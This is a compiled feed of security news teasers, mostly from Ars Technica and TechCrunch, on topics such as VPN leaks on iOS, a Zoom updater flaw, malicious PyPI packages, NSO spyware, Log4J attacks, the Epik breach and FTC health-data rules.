iOS VPNs have leaked traffic for more than 2 years, researcher claims

iOS VPNs have leaked traffic for more than 2 years, researcher claims

Enlarge (credit: Getty Images)

A security researcher says that Apple’s iOS devices don’t fully route all network traffic through VPNs, a potential security issue the device maker has known about for years.

Michael Horowitz, a longtime computer security blogger and researcher, puts it plainly—if contentiously—in a continually updated blog post. “VPNs on iOS are broken,” he says.

Any third-party VPN seems to work at first, giving the device a new IP address, DNS servers, and a tunnel for new traffic, Horowitz writes. But sessions and connections established before a VPN is activated do not terminate and, in Horowitz’s findings with advanced router logging, can still send data outside the VPN tunnel while it’s active.

Read 11 remaining paragraphs | Comments

#apple, #biz-it, #ios, #michael-horowitz, #privacy, #proton, #protonvpn, #security, #vpn

Update Zoom for Mac now to avoid root-access vulnerability

A critical vulnerability in Zoom for Mac OS allowed unauthorized users to downgrade Zoom or even gain root access. It has been fixed, and users should update now.

Enlarge / A critical vulnerability in Zoom for Mac OS allowed unauthorized users to downgrade Zoom or even gain root access. It has been fixed, and users should update now. (credit: Getty Images)

If you’re using Zoom on a Mac, it’s time for a manual update. The video conferencing software’s latest update fixes an auto-update vulnerability that could have allowed malicious programs to use its elevated installing powers, granting escalated privileges and control of the system.

The vulnerability was first discovered by Patrick Wardle, founder of the Objective-See Foundation, a nonprofit Mac OS security group. Wardle detailed in a talk at Def Con last week how Zoom’s installer asks for a user password when installing or uninstalling, but its auto-update function, enabled by default, doesn’t need one. Wardle found that Zoom’s updater is owned by and runs as the root user.

It seemed secure, as only Zoom clients could connect to the privileged daemon, and only packages signed by Zoom could be extracted. The problem is that by simply passing the verification checker the name of the package it was looking for (“Zoom Video ... Certification Authority Apple Root CA.pkg“), this check could be bypassed. That meant malicious actors could force Zoom to downgrade to a buggier, less-secure version or even pass it an entirely different package that could give them root access to the system.

Read 3 remaining paragraphs | Comments

#biz-it, #def-con, #mac, #mac-os, #objective-see, #patrick-wardle, #security, #zoom

10 malicious Python packages exposed in latest repository attack

Supply-chain attacks, like the latest PyPi discovery, insert malicious code into seemingly functional software packages used by developers. They're becoming increasingly common.

Enlarge / Supply-chain attacks, like the latest PyPi discovery, insert malicious code into seemingly functional software packages used by developers. They’re becoming increasingly common. (credit: Getty Images)

Researchers have discovered yet another set of malicious packages in PyPi, the official and most popular repository for Python programs and code libraries. Those duped by the seemingly familiar packages could be subject to malware downloads or theft of user credentials and passwords.

Check Point Research, which reported its findings Monday, wrote that it didn’t know how many people had downloaded the 10 packages, but it noted that PyPi has 613,000 active users, and its code is used in more than 390,000 projects. Installing from PyPi through the pip command is a foundational step for starting or setting up many Python projects. PePy, a site that estimates Python project downloads, suggests most of the malicious packages saw hundreds of downloads.

Such supply-chain attacks are becoming increasingly common, especially among open source software repositories that support a wide swath of the world’s software. Python’s repository is a frequent target, with researchers finding malicious packages in September 2017JuneJuly, and November 2021; and June of this year. But trick packages have also been found in RubyGems in 2020NPM in December 2021, and many more open source repositories.

Read 5 remaining paragraphs | Comments

#biz-it, #github, #malware, #npm, #pypi, #python, #security, #sigstore, #software-supply-chain-attack, #supply-chain-attack, #tech

Microsoft makes major course reversal, allows Office to run untrusted macros

Microsoft makes major course reversal, allows Office to run untrusted macros

Enlarge (credit: Getty Images)

Microsoft has stunned core parts of the security community with a decision to quietly reverse course and allow untrusted macros to be opened by default in Word and other Office applications.

In February, the software maker announced a major change it said it enacted to combat the growing scourge of ransomware and other malware attacks. Going forward, macros downloaded from the Internet would be disabled entirely by default. Whereas previously, Office provided alert banners that could be disregarded with the click of a button, the new warnings would provide no such way to enable the macros.

“We will continue to adjust our user experience for macros, as we’ve done here, to make it more difficult to trick users into running malicious code via social engineering while maintaining a path for legitimate macros to be enabled where appropriate via Trusted Publishers and/or Trusted Locations,” Microsoft Office Program Manager Tristan Davis wrote in explaining the reason for the move.

Read 10 remaining paragraphs | Comments

#biz-it, #macros, #microsoft, #office, #security

New ultra-stealthy Linux backdoor isn’t your everyday malware discovery

Stylized illustration of binary code.

Enlarge (credit: Getty Images / iStock)

Researchers have unearthed a discovery that doesn’t occur all that often in the realm of malware: a mature, never-before-seen Linux backdoor that uses novel evasion techniques to conceal its presence on infected servers, in some cases even with a forensic investigation.

On Thursday, researchers from Intezer and The BlackBerry Threat Research & Intelligence Team said that the previously undetected backdoor combines high levels of access with the ability to scrub any sign of infection from the file system, system processes, and network traffic. Dubbed Symbiote, it targets financial institutions in Brazil and was first detected in November.

Researchers for Intezer and BlackBerry wrote:

Read 6 remaining paragraphs | Comments

#backdoor, #biz-it, #linux, #rootkits, #security

Information security gets personal: How to protect yourself and your stuff

Redefining privacy at Ars Frontiers. Click here for transcript. (video link)

At the Ars Frontiers event in Washington, DC, I had the privilege of moderating two panels on two closely linked topics: digital privacy and information security. Despite significant attempts to improve things, conflicting priorities and inadequate policy have weakened both privacy and security. Some of the same fundamental issues underly the weaknesses in both: Digital privacy and information security are still too demanding for average people to manage, let alone master.

Our privacy panel consisted of Electronic Frontier Foundation deputy executive Kurt Opsahl, security researcher Runa Sandvik, and ACLU Senior Policy Analyst Jay Stanley. Individuals trying to protect their digital privacy face “a constant arms race between what the companies are trying to do, or doing because they can, versus then what people are saying that they either like or don’t like,” Sandvik explained.

Read 7 remaining paragraphs | Comments

#ars-frontiers, #ars-technica-videos, #biz-it, #frontiers-recap, #infosec, #security

Researchers devise iPhone malware that runs even when device is turned off

Researchers devise iPhone malware that runs even when device is turned off

Enlarge (credit: Classen et al.)

When you turn off an iPhone, it doesn’t fully power down. Chips inside the device continue to run in a low-power mode that makes it possible to locate lost or stolen devices using the Find My feature or use credit cards and car keys after the battery dies. Now researchers have devised a way to abuse this always-on mechanism to run malware that remains active even when an iPhone appears to be powered down.

It turns out that the iPhone’s Bluetooth chip—which is key to making features like Find My work—has no mechanism for digitally signing or even encrypting the firmware it runs. Academics at Germany’s Technical University of Darmstadt figured out how to exploit this lack of hardening to run malicious firmware that allows the attacker to track the phone’s location or run new features when the device is turned off.

This video provides a high overview of some of the ways an attack can work.

Read 9 remaining paragraphs | Comments

#biz-it, #firmware, #ios, #iphone, #security

Researchers used a decommissioned satellite to broadcast hacker TV

Researchers used a decommissioned satellite to broadcast hacker TV

Enlarge (credit: Darryl Fonseka | Getty Images)

Independent researchers and the United States military have become increasingly focused on orbiting satellites’ potential security vulnerabilities in recent years. These devices, which are built primarily with durability, reliability, and longevity in mind, were largely never intended to be ultra-secure. But at the ShmooCon security conference in Washington, DC, on Friday, embedded device security researcher Karl Koscher raised questions about a different phase of a satellite’s life cycle: what happens when an old satellite is being decommissioned and transitioning to a “graveyard orbit”?

Koscher and his colleagues received permission last year to access and broadcast from a Canadian satellite known as Anik F1R, launched to support Canadian broadcasters in 2005 and designed for 15 years of use. The satellite’s coverage extends below the US southern border and out to Hawaii and the easternmost part of Russia. The satellite will move to its graveyard orbit soon, and nearly all other services that use it have already migrated to a new satellite. But while the researchers could still talk to the satellite using special access to an uplink license and transponder slot lease, Koscher had the opportunity to take over and broadcast to the Northern Hemisphere.

Read 9 remaining paragraphs | Comments

#biz-it, #hacking, #satellite, #security

Data-harvesting code in mobile apps sends user data to “Russia’s Google”

Photo taken on October 12, 2021 in Moscow shows Russia's internet search engine Yandex's logo on a laptop screen. (Photo by Kirill KUDRYAVTSEV / AFP) (Photo by KIRILL KUDRYAVTSEV/AFP via Getty Images)

Enlarge / Photo taken on October 12, 2021 in Moscow shows Russia’s internet search engine Yandex’s logo on a laptop screen. (Photo by Kirill KUDRYAVTSEV / AFP) (Photo by KIRILL KUDRYAVTSEV/AFP via Getty Images) (credit: Kirill Kudryavtsev | Getty Images)

Russia’s biggest Internet company has embedded code into apps found on mobile devices that allows information about millions of users to be sent to servers located in its home country.

The revelation relates to software created by Yandex that permits developers to create apps for devices running Apple’s iOS and Google’s Android, systems that run the vast majority of the world’s smartphones.

Yandex collects user data harvested from mobiles, before sending the information to servers in Russia. Researchers have raised concerns the same “metadata” may then be accessed by the Kremlin and used to track people through their mobiles.

Read 25 remaining paragraphs | Comments

#android, #apple, #biz-it, #data-harvesting, #google, #ios, #security, #yandex

A big bet to kill the password for good

A big bet to kill the password for good

Enlarge (credit: Elena Lacey)

After years of tantalizing hints that a passwordless future is just around the corner, you’re probably still not feeling any closer to that digital unshackling. Ten years into working on the issue, though, the FIDO Alliance, an industry association that specifically works on secure authentication, thinks it has finally identified the missing piece of the puzzle.

On Thursday, the organization published a white paper that lays out FIDO’s vision for solving the usability issues that have dogged passwordless features and, seemingly, kept them from achieving broad adoption. FIDO’s members collaborated to produce the paper, and they span chipmakers like Intel and Qualcomm, prominent platform developers like Amazon and Meta, financial institutions like American Express and Bank of America, and the developers of all major operating systems—Google, Microsoft, and Apple.

Read 16 remaining paragraphs | Comments

#biometrics, #biz-it, #fido, #hardware-tokens, #passwords, #security

WHO, US worry Ukrainian biological lab samples could spill, go to Russians

A health care worker carries test tubes while on duty in the bacteriological laboratory at the Lviv Regional Laboratory Centre of the State Sanitary and Epidemiological Service, Lviv, western Ukraine.

Enlarge / A health care worker carries test tubes while on duty in the bacteriological laboratory at the Lviv Regional Laboratory Centre of the State Sanitary and Epidemiological Service, Lviv, western Ukraine. (credit: Getty | Future Publishing)

The World Health Organization has advised officials in Ukraine to destroy any high-risk pathogens housed in public health laboratories in order to prevent their release amid the Russian onslaught, according to a report by Reuters.

The agency said that it has worked with Ukrainian officials for years to promote security practices at its laboratories to prevent “accidental or deliberate release of pathogens.” As part of that longstanding work, “WHO has strongly recommended to the Ministry of Health in Ukraine and other responsible bodies to destroy high-threat pathogens to prevent any potential spills,” the agency said in an email to Reuters. The WHO did not clarify when it made that recommendation or if it was carried out.

The news follows Senate testimony on Tuesday by Victoria Nuland, US Undersecretary of State for Political Affairs, who said that the US is “quite concerned” that Russian troops will seek out Ukraine’s biological research laboratories to seize control of any potentially dangerous samples.

Read 6 remaining paragraphs | Comments

#biological-weapons, #biowarfare, #chemical-weapons, #public-health, #research-laboratories, #russia, #science, #security, #ukraine, #us

Attackers can force Amazon Echos to hack themselves with self-issued commands

A group of Amazon Echo smart speakers, including Echo Studio, Echo, and Echo Dot models. (Photo by Neil Godwin/Future Publishing via Getty Images)

Enlarge / A group of Amazon Echo smart speakers, including Echo Studio, Echo, and Echo Dot models. (Photo by Neil Godwin/Future Publishing via Getty Images) (credit: T3 Magazine/Getty Images)

Academic researchers have devised a new working exploit that commandeers Amazon Echo smart speakers and forces them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances.

The attack works by using the device’s speaker to issue voice commands. As long as the speech contains the device wake word (usually “Alexa” or “Echo”) followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway University in London and Italy’s University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it’s trivial to bypass the measure by adding the word “yes” about six seconds after issuing the command. Attackers can also exploit what the researchers call the “FVV,” or full voice vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.

Alexa, go hack yourself

Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it “AvA,” short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it’s turned on so an attacker can utter a voice command instructing it to pair with an attacker’s Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands.

Read 12 remaining paragraphs | Comments

#amazon-echo, #biz-it, #eavesdropping, #exploits, #features, #security, #vulnerabilities

Namco Bandai promises Elden Ring is secure following Dark Souls exploit

Promotional screenshot for upcoming video game.

Enlarge / In Elden Ring, you get a horse. (credit: Bandai Namco)

Last month, publisher Namco Bandai took down its online player-versus-player servers for all PC Dark Souls games after players found a serious vulnerability that allowed for remote execution of malicious code on an opponent’s computer. While a Reddit user who publicly identified that issue said the exploit would also work on Namco Bandai’s upcoming Elden Ring, the publisher is now assuring players that the highly anticipated title will be protected.

“We have extended the investigation to Elden Ring… and have made sure the necessary security measures are in place for this title on all target platforms,” Namco Bandai wrote in a tweet Wednesday morning.

The wording of that statement suggests that Elden Ring‘s online services will launch as expected when the game is released on February 25. That’s important for players looking forward to online co-op gameplay, competitive multiplayer battles/invasions, and even basic message support between player worlds, as seen in Dark Souls.

Read 3 remaining paragraphs | Comments

#dark-souls, #elden-ring, #exploit, #gaming-culture, #namco-bandai, #security

Coming to a laptop near you: A new type of security chip from Microsoft

Promotional image of new laptop computer.

Enlarge (credit: Lenovo)

In November 2020, Microsoft unveiled Pluton, a security processor the company designed to thwart some of the most sophisticated types of hack attacks. On Tuesday, AMD said it would integrate the chip into its upcoming Ryzen CPUs for use in Lenovo’s ThinkPad Z Series of laptops.

Microsoft already used Pluton to secure Xbox Ones and Azure Sphere microcontrollers against attacks that involve people with physical access opening device cases and performing hardware hacks that bypass security protections. Such hacks are usually carried out by device owners who want to run unauthorized games or programs for cheating.

Now, Pluton is evolving to secure PCs against malicious physical hacks designed to install malware or steal cryptographic keys or other sensitive secrets. While many systems already have trusted platform modules or protections such as Intel’s Software Guard Extensions to secure such data, the secrets remain vulnerable to several types of attacks.

Read 11 remaining paragraphs | Comments

#amd, #biz-it, #lenovo, #pluton, #ryzen, #security, #thinkpad

Google warns that NSO hacking is on par with elite nation-state spies

A man walks by the building entrance of Israeli cyber company NSO Group at one of its branches in the Arava Desert on November 11, 2021, in Sapir, Israel.

Enlarge / A man walks by the building entrance of Israeli cyber company NSO Group at one of its branches in the Arava Desert on November 11, 2021, in Sapir, Israel. (credit: Amir Levy | Getty Images)

The Israeli spyware developer NSO Group has shocked the global security community for years with aggressive and effective hacking toolsthat can target both Android and iOS devices. The company’s products have been so abused by its customers around the world that NSO Group now faces sanctions, high-profile lawsuits, and an uncertain future. But a new analysis of the spyware maker’s ForcedEntry iOS exploit—deployed in a number of targeted attacks against activists, dissidents, and journalists this year—comes with an even more fundamental warning: Private businesses can produce hacking tools that have the technical ingenuity and sophistication of the most elite government-backed development groups.

Google’s Project Zero bug-hunting group analyzed ForcedEntry using a sample provided by researchers at the University of Toronto’s Citizen Lab, which published extensively this year about targeted attacks utilizing the exploit. Researchers from Amnesty International also conducted important research about the hacking tool this year. The exploit mounts a zero-click, or interactionless, attack, meaning that victims don’t need to click a link or grant a permission for the hack to move forward. Project Zero found that ForcedEntry used a series of shrewd tactics to target Apple’s iMessage platform, bypass protections the company added in recent years to make such attacks more difficult, and adroitly take over devices to install NSO’s flagship spyware implant Pegasus.

Apple released a series of patches in September and October that mitigate the ForcedEntry attack and harden iMessage against future, similar attacks. But the Project Zero researchers write in their analysis that ForcedEntry is still “one of the most technically sophisticated exploits we’ve ever seen.” NSO Group has achieved a level of innovation and refinement, they say, that is generally assumed to be reserved for a small cadre of nation-state hackers.

Read 8 remaining paragraphs | Comments

#biz-it, #forced-entry, #security, #wired

New PS4 homebrew exploit points to similar PS5 hacks to come

Sony's PlayStation 4.

Enlarge / Sony’s PlayStation 4. (credit: Andrew Cunningham)

Hackers have released details of a new exploit that allows homebrew and custom firmware to be installed on PS4 consoles running relatively recent firmware. What’s more, the specifics of the exploit suggest similar homebrew capabilities may soon be available on some versions of the PlayStation 5.

The new exploit builds on a known error in the way that the PS4’s WebKit implementation utilizes font-faces. That exploit on the PS4 was publicized in October as a proof of concept after a similar error was found in Apple’s Safari WebKit implementation in September.

On the PS4, the full exploit can now be triggered by visiting a website with specially formatted JavaScript via the PS4 web browser, allowing the system to run kernel-level code that bypasses the console’s usual security protections. From there, the exploit can read files from an inserted USB stick and install homebrew software, including existing custom PS4 firmware.

Read 6 remaining paragraphs | Comments

#gaming-culture, #homebrew, #playstation, #security

Hackers launch over 840,000 attacks through Log4J flaw

Hackers launch over 840,000 attacks through Log4J flaw

Enlarge (credit: Matejmo | Getty Images)

Hackers including Chinese state-backed groups have launched more than 840,000 attacks on companies globally since last Friday, according to researchers, through a previously unnoticed vulnerability in a widely used piece of open-source software called Log4J.

Cyber security group Check Point said the attacks relating to the vulnerability had accelerated in the 72 hours since Friday, and that at some points its researchers were seeing more than 100 attacks a minute.

Perpetrators include “Chinese government attackers,” according to Charles Carmakal, chief technology officer of cyber company Mandiant.

Read 11 remaining paragraphs | Comments

#biz-it, #china, #hacking, #log4j, #security

iPhones of US diplomats hacked using “0-click” exploits from embattled NSO

iPhones of US diplomats hacked using “0-click” exploits from embattled NSO

Enlarge (credit: Getty Images)

The iPhones of nine US State Department officials were infected by powerful and stealthy malware developed by NSO Group, the Israeli exploit seller that has come under increasing scrutiny for selling its wares to journalists, lawyers, activists, and US allies.

The US officials, either stationed in Uganda or focusing on issues related to that country, received warnings like this one from Apple informing them their iPhones were being targeted by hackers. Citing unnamed people with knowledge of the attacks, Reuters said the hackers used software from NSO.

No clicking required

As previously reported, NSO software known as Pegasus uses exploits sent through messaging apps that infect iPhones and Android devices without requiring targets to click links or take any other action. From there, the devices run hard-to-detect malware that can download photos, contacts, text messages, and other data. The malware also allows the operator to listen to audio and view video in real time.

Read 3 remaining paragraphs | Comments

#biz-it, #iphone, #nso-group, #security

New secret-spilling hole in Intel CPUs sends company patching (again)

New secret-spilling hole in Intel CPUs sends company patching (again)

Enlarge (credit: Intel)

Intel is fixing a vulnerability that unauthorized people with physical access can exploit to install malicious firmware on the chip to defeat a variety of measures, including protections provided by Bitlocker, trusted platform modules, anti-copying restrictions, and others.

The vulnerability—present in Pentium, Celeron, and Atom CPUs on the Apollo Lake, Gemini Lake, and Gemini Lake Refresh platforms—allows skilled hackers with possession of an affected chip to run it in debug and testing modes used by firmware developers. Intel and other chipmakers go to great lengths to prevent such access by unauthorized people.

Once in developer mode, an attacker can extract the key used to encrypt data stored in the TPM enclave and, in the event TPM is being used to store a Bitlocker key, defeat that latter protection as well. An adversary could also bypass code-signing restrictions that prevent unauthorized firmware from running in the Intel Management Engine, a subsystem inside vulnerable CPUs, and from there permanently backdoor the chip.

Read 13 remaining paragraphs | Comments

#central-processing-unit, #security, #tech

Google Fi is getting end-to-end encrypted phone calls

Google Fi is getting end-to-end encrypted phone calls

Enlarge

Google’s MVNO cell phone service, Google Fi, is getting a surprise new feature: encrypted phone calls. Encrypted voice chats via messaging apps have been available for a while, but this is the first time we’ve seen a company hijack the regular phone system for end-to-end encrypted calls. Open the phone app, dial a number, and your call can be encrypted.

End-to-end encryption is not a normal phone standard, so both parties on the call will need to be firmly in the Google Fi ecosystem for the feature to work. Google’s description says that “calls between two Android phones on Fi will be secured with end-to-end encryption by default.” Google Fi works on the iPhone, too, but given that Google would have to use Apple’s default phone app, it can’t add encryption.

For encrypted Fi-to-Fi calls, Google will show a new “Encrypted by Google Fi” message in both users’ phone apps, along with the ubiquitous lock icon. The company says there will be “unique audio cues” as well.

Read 2 remaining paragraphs | Comments

#encryption, #google-fi, #security, #tech

Securing your digital life, part two: The bigger picture—and special circumstances

Securing your digital life, part two: The bigger picture—and special circumstances

Enlarge (credit: ANDRZEJ WOJCICKI / SCIENCE PHOTO LIBRARY / Getty Images)

In the first half of this guide to personal digital security, I covered the basics of assessing digital risks and protecting what you can control: your devices. But the physical devices you use represent only a fraction of your overall digital exposure.

According to a report by Aite Group, nearly half of US consumers experienced some form of identity theft over the last two years. Losses from these thefts are expected to reach $721.3 billion for 2021—and that’s only counting cases where criminals take over and abuse online accounts. Other valuable parts of your digital life may not carry specific monetary risks to you but could still have a tangible impact on your privacy, safety, and overall financial health.

Case in point: last September, my Twitter account was targeted for takeover by an unidentified attacker. Even though I had taken multiple measures to prevent the theft of my account (including two-factor authentication), the attacker made it impossible for me to log in (though they were locked out of the account as well). It took several weeks and some high-level communication with Twitter to restore my account. As someone whose livelihood is tied to getting the word out about things with a verified Twitter account, this went beyond inconvenience and was really screwing with my job.

Read 20 remaining paragraphs | Comments

#biz-it, #features, #infosec, #securing-your-digital-life, #security

Securing your digital life, part one: The basics

Artist's impression of how to keep your digital stuff safe from all kinds of threats.

Enlarge / Artist’s impression of how to keep your digital stuff safe from all kinds of threats. (credit: Aurich Lawson | Getty Images)

I spend most of my time these days investigating the uglier side of digital life—examining the techniques, tools, and practices of cyber criminals to help people better defend against them. It’s not entirely different from my days at Ars Technica, but it has given me a greater appreciation for just how hard it is for normal folks to stay “safe” digitally.

Even those who consider themselves well educated about cyber crime and security threats—and who do everything they’ve been taught to do—can (and do!) still end up as victims. The truth is that, with enough time, resources, and skill, everything can be hacked.

The key to protecting your digital life is to make it as expensive and impractical as possible for someone bent on mischief to steal the things most important to your safety, financial security, and privacy. If attackers find it too difficult or expensive to get your stuff, there’s a good chance they’ll simply move on to an easier target. For that reason, it’s important to assess the ways that vital information can be stolen or leaked—and understand the limits to protecting that information.

Read 34 remaining paragraphs | Comments

#biz-it, #features, #infosec, #securing-your-digital-life, #security

Researcher refuses Telegram’s bounty award, discloses auto-delete bug

Researcher refuses Telegram’s bounty award, discloses auto-delete bug

Enlarge (credit: Joshua Sortino)

Telegram patched another image self-destruction bug in its app earlier this year. This flaw was a different issue from the one reported in 2019. But the researcher who reported the bug isn’t pleased with Telegram’s months-long turnaround time—and an offered $1,159 (€1,000) bounty award in exchange for his silence.

Self-destructed images remained on the device

Like other messaging apps, Telegram allows senders to set communications to “self-destruct,” such that messages and any media attachments are automatically deleted from the device after a set period of time. Such a feature offers extended privacy to both the senders and the recipients intending to communicate discreetly.

In February 2021, Telegram introduced a set of such auto-deletion features in its 2.6 release:

Read 12 remaining paragraphs | Comments

#biz-it, #bug-bounty, #confidential, #end-to-end-encryption, #hackerone, #messaging-app, #nda, #security, #tech, #telegram

Facebook’s latest “apology” reveals security and safety disarray

A person in a Hazmat suit covers the Facebook logo with warning tape.

Enlarge (credit: Aurich Lawson / Getty Images)

Facebook had it rough last week. Leaked documents—many leaked documents—formed the backbone of a string of reports published in The Wall Street Journal. Together, the stories paint the picture of a company barely in control of its own creation. The revelations run the gamut: Facebook had created special rules for VIPs that largely exempted 5.8 million users from moderation, forced troll farm content on 40 percent of America, created toxic conditions for teen girls, ignored cartels and human traffickers, and even undermined CEO Mark Zuckerberg’s own desire to promote vaccination against COVID.

Now, Facebook wants you to know it’s sorry and that it’s trying to do better.

“In the past, we didn’t address safety and security challenges early enough in the product development process,” the company said in an unsigned press release today. “Instead, we made improvements reactively in response to a specific abuse. But we have fundamentally changed that approach.”

Read 10 remaining paragraphs | Comments

#facebook, #mark-zuckerberg, #policy, #security, #social-media

Stairwell secures $20M Series A to help organizations outsmart attackers

Back when Stairwell emerged from stealth in 2020, the startup was shrouded in secrecy. Now with $20 million in Series A funding, its founder and CEO Mike Wiacek — who previously served as chief security officer at Chronicle, Google’s moonshot cybersecurity company — is ready to talk.

As well as raising $20M, an investment round co-led by Sequoia Capital and Accel, Stairwell is launching Inception, a threat hunting platform that aims to help organizations determine if they were compromised now or in the past. Unlike other threat detection platforms, Inception takes an “inside out” approach to cybersecurity, which starts by looking inwards at a company’s data.

“This helps you study what’s in your environment first before you start thinking about what’s happening in the outside world,” Wiacek tells TechCrunch. “The beautiful thing about that approach is that’s not information that outside parties, a.k.a. the bad guys, are privy to.”

This data, all of which is treated as suspicious, is continuously evaluated in light of new indicators and new threat intelligence. Stairwell claims this enables organizations to detect anomalies within just days, rather than the industry average of 280 days, as well as to “bootstrap” future detections.

“If you go and buy a threat intelligence feed from Vendor X, do you really think that someone who’s spending hundreds of thousands, or even millions of dollars to conduct an offensive campaign isn’t going to make sure that whatever they’re using isn’t in that field?,” said Wiacek. “They know what McAfee knows and they know other antivirus engines know, but they don’t know what you know and that’s a very powerful advantage that you have there.”

Stairwell’s $20 million in Series A funding, which comes less than 12 months after it secured $4.5 million in seed funding, will be used to further advance the Inception platform and to increase the startup’s headcount; the Palo Alto-based firm currently has a modest headcount of 21.

The Inception platform, which the startup claims finally enables enterprises to “outsmart the bad guys”, is launching in early release for a limited number of customers, with full general availability scheduled for 2022.

“I just wish we had a product to market when SolarWinds happened,” Wiacek added.

#accel, #anomali, #ceo, #computer-security, #computing, #google-cloud, #inception, #information-technology, #mcafee, #palo-alto, #security, #sequoia-capital, #solarwinds, #stairwell, #system-administration

F5 acquires cloud security startup Threat Stack for $68 million

Applications networking company F5 has announced it’s acquiring Threat Stack, a Boston-based cloud security and compliance startup, for $68 million.

The deal, which comes months after F5 bought multi-cloud management startup Volterra for $500 million, sees the 25-year-old company looking to bolster its cloud security portfolio as applications become a growing focus for cybercriminals. Businesses lose more than $100 billion a year to attacks targeting digital experiences, F5 says and these experiences are increasingly powered by applications distributed across multiple environments and interconnected through APIs.

Threat Stack, which was founded in November 2012 and has since amassed more than $70 million across six funding rounds including a $45 million Series C round led by F-Prime Capital Partners and Eight Roads Ventures, specializes in cloud security for applications and provides customers with real-time threat detection for cloud infrastructure and workloads. Unlike many cloud security tools that kick in after an intrusion, Threat Stack takes a more proactive approach, alerting organizations to all known vulnerabilities and providing a report on the holes that need to be plugged.

The startup’s intrusion detection platform, the Threat Stack Cloud Security Platform, works across cloud, hybrid cloud, multi-cloud, and containerized environments, and is perhaps best known for its Slack integration that alerts DevOps teams to security concerns in real-time. Threat Stack has a number of big-name customers, according to its website, including Glassdoor, Ping Identity and Proofpoint.

F5 says that integrating its application and API protection solutions with Threat Stack’s cloud security capabilities and expertise will enhance visibility across application infrastructure and workloads, making it easier for customers to adopt consistent security in any cloud.

“Applications are the backbone of today’s modern businesses, and protecting them is mission-critical for our customers,” said Haiyan Song, EVP of Security at F5. “Threat Stack brings technology and talent that will strengthen F5’s security capabilities and further our adaptive applications vision with broader cloud observability and actionable security insights for customers.”

The acquisition, which is expected to close in F5’s first-quarter fiscal year 2022, is subject to closing conditions.

#api, #boston, #cloud-computing, #cloud-infrastructure, #cloud-management, #computing, #eight-roads-ventures, #f5, #glassdoor, #palo-alto-networks, #ping-identity, #security, #splunk, #system-administration, #threat-stack, #volterra

Web host Epik was warned of a critical website bug weeks before it was hacked

Hackers associated with the hacktivist collective Anonymous say they have leaked gigabytes of data from Epik, a web host and domain registrar that provides services to far-right sites like Gab, Parler and 8chan, which found refuge in Epik after they were booted from mainstream platforms.

In a statement attached to a torrent file of the dumped data this week, the group said the 180 gigabytes amounts to a “decade’s worth” of company data, including “all that’s needed to trace actual ownership and management” of the company. The group claimed to have customer payment histories, domain purchases and transfers, and passwords, credentials, and employee mailboxes. The cache of stolen data also contains files from the company’s internal web servers, and databases that contain customer records for domains that are registered with Epik.

The hackers did not say how they obtained the breached data or when the hack took place, but timestamps on the most recent files suggest the hack likely happened in late February.

Epik initially told reporters it was unaware of a breach, but an email sent out by founder and chief executive Robert Monster on Wednesday alerted users to an “alleged security incident.”

TechCrunch has since learned that Epik was warned of a critical security flaw weeks before its breach.

Security researcher Corben Leo contacted Epik’s chief executive Monster over LinkedIn in January about a security vulnerability on the web host’s website. Leo asked if the company had a bug bounty or a way to report the vulnerability. LinkedIn showed Monster had read the message but did not respond.

Leo told TechCrunch that a library used on Epik’s WHOIS page for generating PDF reports of public domain records had a decade-old vulnerability that allowed anyone to remotely run code directly on the internal server without any authentication, such as a company password.

“You could just paste this [line of code] in there and execute any command on their servers,” Leo told TechCrunch.

Leo ran a proof-of-concept command from the public-facing WHOIS page to ask the server to display its username, which confirmed that code could run on Epik’s internal server, but he did not test to see what access the server had as doing so would be illegal.

It’s not known if the Anonymous hacktivists used the same vulnerability that Leo discovered. (Part of the stolen cache also includes folders relating to Epik’s WHOIS system, but the hacktivists left no contact information and could not be reached for comment.) But Leo contends that if a hacker exploited the same vulnerability and the server had access to other servers, databases or systems on the network, that access could have allowed access to the kind of data stolen from Epik’s internal network in February.

“I am really guessing that’s how they got owned,” Leo told TechCrunch, who confirmed that the flaw has since been fixed.

Monster confirmed he received Leo’s message on LinkedIn, but did not answer our questions about the breach or say when the vulnerability was patched. “We get bounty hunters pitching their services. I probably just thought it was one of those,” said Monster. “I am not sure if I actioned it. Do you answer all your LinkedIn spams?”

#8chan, #computer-security, #computing, #cyberspace, #cyberwarfare, #epik, #gab, #parler, #rob-monster, #security, #texas, #world-wide-web

FTC says health apps must notify consumers about data breaches — or face fines

The U.S. Federal Trade Commission (FTC) has warned apps and devices that collect personal health information must notify consumers if their data is breached or shared with third parties without their permission.

In a 3-2 vote on Wednesday, the FTC agreed on a new policy statement to clarify a decade-old 2009 Health Breach Notification Rule, which requires companies handling health records to notify consumers if their data is accessed without permission, such as the result of a breach. This has now been extended to apply to health apps and devices — specifically calling out apps that track fertility data, fitness, and blood glucose — which “too often fail to invest in adequate privacy and data security,” according to FTC chair Lina Khan.

“Digital apps are routinely caught playing fast and loose with user data, leaving users’ sensitive health information susceptible to hacks and breaches,” said Khan in a statement, pointing to a study published this year in the British Medical Journal that found health apps suffer from “serious problems” ranging from the insecure transmission of user data to the unauthorized sharing of data with advertisers.

There have also been a number of recent high-profile breaches involving health apps in recent years. Babylon Health, a U.K. AI chatbot and telehealth startup, last year suffered a data breach after a “software error” allowed users to access other patients’ video consultations, while period tracking app Flo was recently found to be sharing users’ health data with third-party analytics and marketing services.

Under the new rule, any company offering health apps or connected fitness devices that collect personal health data must notify consumers if their data has been compromised. However, the rule doesn’t define a “data breach” as just a cybersecurity intrusion; unauthorized access to personal data, including the sharing of information without an individual’s permission, can also trigger notification obligations.

“While this rule imposes some measure of accountability on tech firms that abuse our personal information, a more fundamental problem is the commodification of sensitive health information, where companies can use this data to feed behavioral ads or power user analytics,” Khan said.

If companies don’t comply with the rule, the FTC said it will “vigorously” enforce fines of $43,792 per violation per day.

The FTC has been cracking down on privacy violations in recent weeks. Earlier this month, the agency unanimously voted to ban spyware maker SpyFone and its chief executive Scott Zuckerman from the surveillance industry for harvesting mobile data on thousands of people and leaving it on the open internet.

#articles, #artificial-intelligence, #babylon-health, #chair, #data-breach, #digital-rights, #flo, #government, #identity-management, #lina-khan, #open-internet, #security, #security-breaches, #social-issues, #spyfone, #terms-of-service

Ransomware: A market problem deserves a market solution

